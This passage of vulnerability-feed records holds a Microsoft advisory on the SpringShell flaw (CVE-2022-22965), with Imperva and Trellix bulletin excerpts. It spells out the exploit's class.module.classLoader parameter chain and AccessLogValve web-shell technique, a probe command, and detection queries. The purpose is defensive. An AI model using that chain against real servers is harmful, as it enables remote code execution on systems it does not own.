If you\u2019re looking for protection from CVE-2022-22963, please contact us.\n\n**Q: How can I verify that Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) is being blocked?**\n\n**A:** For CWAF customers, Imperva provides attack analytics, which shows customers any attempts to exploit CVE-2022-22963. In addition, existing rules for older vulnerabilities including CVE-2015-1427 protect against CVE-2022-22965.\n\nFor WAF Gateway customers, Imperva has signatures for older vulnerabilities, including CVE-2010-1871, CVE-2018-1260, and CVE-2015-1427 that protect against CVE-2022-22963 and CVE-2022-22965\n\nImperva is also in the process of pushing more specific rules that will have a clear name associated with CVE-2022-22963 and CVE-2022-22965.\n\nThe post [Imperva Protects from New Spring Framework Zero-Day Vulnerabilities](<https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:20:03", "type": "impervablog", "title": "Imperva Protects from New Spring Framework Zero-Day Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2015-1427", "CVE-2018-1260", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T15:20:03", "id": "IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B", "href": "https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. 
In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. 
Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable. Also make sure the 400 comes from the application itself: a WAF or reverse proxy in front of the host may block the probe and answer with its own 4xx (the WAF rules described below are designed to match requests of this shape), so where possible run the check directly against the application, and treat a non-400 response as inconclusive rather than as proof that the host is safe.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. 
For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing. (The file name _shell.jsp_ and the request parameters shown here are choices made by the public POC, not fixed properties of the vulnerability; a real attacker can pick different names.)\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessLogValve_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. 
While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for the manipulation of the access log so that it is written to an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which effectively drops a web shell inside Tomcat's web root. Note that this is a web shell reached by ordinary inbound HTTP requests, not a reverse shell: the server never has to open an outbound connection, so egress filtering alone does not stop this stage. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. 
So, if, for instance, _Location_ is defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinates.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. 
If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor that gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. This is a textbook denylist failure: the 2010 fix blocked one named accessor path rather than the underlying capability, so a new path to the same object introduced by a later JDK reopened the hole without any change in Spring itself. 
Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by HTTP requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server with the privileges of the account that runs the Tomcat process; running Tomcat as a dedicated low-privilege account therefore limits what a dropped shell can reach.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. 
\n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. 
New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. Treat these WAF rules as a compensating control that buys time: they do not remove the vulnerability from the application, and the patch described below is still required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.20 or later (5.2.19 is listed among the affected versions above, so it is not a safe target). 
If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** a controller-local setDisallowedFields call takes precedence over the global advice below, so if this code snippet is used in several places the patterns must be appended in each location; otherwise those controllers stay exposed.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder){\n String[]abd=new String[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\nTreat this workaround as a stop-gap until the patch is applied, and test that it is actually in effect before relying on it.\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alert indicates an observed attack, but might not be unique to exploitation of this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### 
Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS. It also keys on the `.jsp?cmd=` request shape used by the public POC's web shell, so a renamed shell file or command parameter will not match; pair it with the WAF-based queries below, and hunt for the _class.module.classLoader_ parameter prefix wherever request data is available.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. 
This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trellix": [{"lastseen": "2022-05-04T00:00:00", "description": "# The Bug Report \u2013 April 2022 Edition \n\nBy Mark Bereza \u00b7 May 4, 2022\n\n## Your Cybersecurity Comic Relief\n\n Source: https://twitter.com/cyb3rops/status/1509290413168934918 \n\n\n### Why Am I here?\n\nFor those in my hemisphere, springtime is finally here and, like always, it promises change: the flowers are blooming, the birds are chirping, and seasonal allergies are in full swing \u2013 it is truly the greatest time of year. Some things, however, remain constant: death, taxes, The Bug Report, and Java ruining your life. 
We at Trellix are proud to continue bringing you the one thing on that list worth looking forward to, month after month.\n\nThis month featured some truly standout vulns, meaning our resident Shadow Council spent little time deliberating which ones would make the cut, giving us ample time to really dig into the ones that did:\n\n * CVE-2022-21449 aka \u201cPsychic Signatures\u201d: Java\n * CVE-2022-26809: MSRPC\n * CVE-2022-22965 aka \u201cSpring4Shell\u201d: [Spring Framework](<https://spring.io/projects/spring-framework>)\n\nThe more pedantic among you might be thinking, _\u201cWell, actually, Spring4Shell was reported in late March, so why is it in April\u2019s Bug Report?\u201d_ The short answer is that time is a social construct. The long answer is the vulnerability was reported right at the end of March (03/29), meaning by the time it became apparent just how critical it was, it was too late to include it in March\u2019s report. Better late than never! \n\n## CVE-2022-21449: Failing, even with a curve\n\n### What is it?\n\nIt is often said that cryptography is one of the few good things we have in cybersecurity, and for good reason. Unfortunately, cryptography is like a joke in that it\u2019s all about delivery, and even the best cryptographic algorithms can\u2019t prevent errors in implementation. Even more unfortunately, \u201ccryptography is like a joke\u201d is actually a perfect description of Java\u2019s [ECDSA](<https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm>) implementation. [With the release of Java 15](<https://bugs.openjdk.java.net/browse/JDK-8237218>), the original native code implementation was rewritten in Java, introducing a major bug that made it trivial to bypass its ECDSA signature validation, [according to Neil Madden of ForgeRock](<https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/>). 
Madden first disclosed the vulnerability to Oracle in November of 2021, but chose not to go public with it until six months later, after Oracle finally addressed the issue in their [April 2022 Critical Patch Update (CPU)](<https://www.oracle.com/security-alerts/cpuapr2022.html>). In his article, Madden dubs the vuln \u201cPsychic Signatures,\u201d after the blank psychic paper used by Doctor Who as an all-purpose ID card \u2013 quite fitting.\n\nTo fully understand the mechanics of CVE-2022-21449 would require a crash course in elliptic curve cryptography \u2013 well beyond the scope of our humble report \u2013 so the short version is that an ECDSA signature consists of two values: _r_ and _s_. Validating an ECDSA signature involves checking that the left and right sides of a particular elliptic curve equation are indeed equal, with the left side being _r_, and the right side being proportional (kind of) to _s_. This equation becomes trivially true (0 = 0) if both _r_ and _s_ are zero, so such a signature would always be considered \u201cvalid\u201d regardless of the message contents or the key used. To address this, one of the steps in the ECDSA algorithm involves rejecting a signature as invalid if either _r_ or _s_ are zero \u2013 a step that Java\u2019s new implementation skipped. 00ps.\n\n### Who cares?\n\nECDSA is like plumbing; we use it all the time, but most people don\u2019t think about it until something goes wrong. The various fixtures powered by Java\u2019s ECDSA plumbing include many popular web authentication/authorization standards such as [JWT](<https://en.wikipedia.org/wiki/JSON_Web_Token>)s, [SAML](<https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language>), and [WebAuthn](<https://en.wikipedia.org/wiki/WebAuthn>), responsible for gating access to sensitive resources on servers and even managing Single Sign-On (SSO) for users across security domains. 
Perhaps even more troubling, because the flaw is in signature *verification* rather than generation, any Java-based TLS client or server that validates ECDSA signatures (on certificates or in the handshake itself) can be tricked into accepting a forged one, in which case an attacker could leverage this vuln to man-in-the-middle encrypted traffic. This is all to say that you shouldn\u2019t let Oracle\u2019s incredibly conservative CVSS rating of 7.5 fool you into thinking this vuln isn\u2019t a big deal. As for which versions are impacted, Oracle has indicated that Java 15, 16, 17, and 18 prior to their April CPU are all vulnerable. \n\nAlthough the scope of CVE-2022-21449 is certainly smaller than the infamous [Log4Shell](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>), it\u2019s worth noting that Log4Shell was a bug in a third-party Java library, whereas this is a bug in the Java runtime itself. Furthermore, Psychic Signatures is just as easy to exploit and [PoC code already exists](<https://github.com/khalednassar/CVE-2022-21449-TLS-PoC>), meaning that although there is currently no evidence of in-the-wild exploitation, it is far from unlikely. In short, if you cared about Log4Shell, then you should probably care about this, too.\n\n### What can I do?\n\nAs is often the case, the best thing you can do is patch ASAP, as Oracle\u2019s April CPU fully mitigates this vulnerability. If this isn\u2019t immediately possible, consider switching all your [Java Cryptography Architecture (JCA)](<https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html>) providers to [BouncyCastle](<https://www.bouncycastle.org/>), an open-source implementation devoid of this bug. If you\u2019re wondering if your organization is impacted, we suggest dusting off that list you made in the aftermath of Log4Shell for all the software in your environment that so much as looks at Java \u2013 there\u2019s bound to be a lot of overlap. 
Barring that, JFrog has released a [tool on GitHub](<https://github.com/jfrog/jfrog-CVE-2022-21449>) that can scan arbitrary JAR/WAR files for presence of the vulnerability, which may prove useful.\n\n \n\n\n## CVE-2022-26809: RPC, it\u2019s easy as 1 2 3\n\n### What is it?\n\nCVE-2022-26809 lacks the catchy monikers of our other two entries this month, but don\u2019t take that as a reflection of its import. Publicly disclosed on April 12 as part of Microsoft\u2019s Patch Tuesday, it is a fully remote, pre-authentication, zero-click vulnerability in [Microsoft Remote Procedure Call (MSRPC)](<https://en.wikipedia.org/wiki/Microsoft_RPC>), a core component of the Windows operating system that is enabled by default, network-accessible, and cannot be disabled without breaking things in the OS. I\u2019ll give everyone a second to pick their jaws up off the floor before continuing.\n\nThe vulnerability was submitted to Microsoft by [Cyber Kunlun](<https://www.cyberkl.com/>), a cybersecurity firm based out of Beijing, who provided Microsoft with an exploit that utilized the [Server Message Block (SMB) 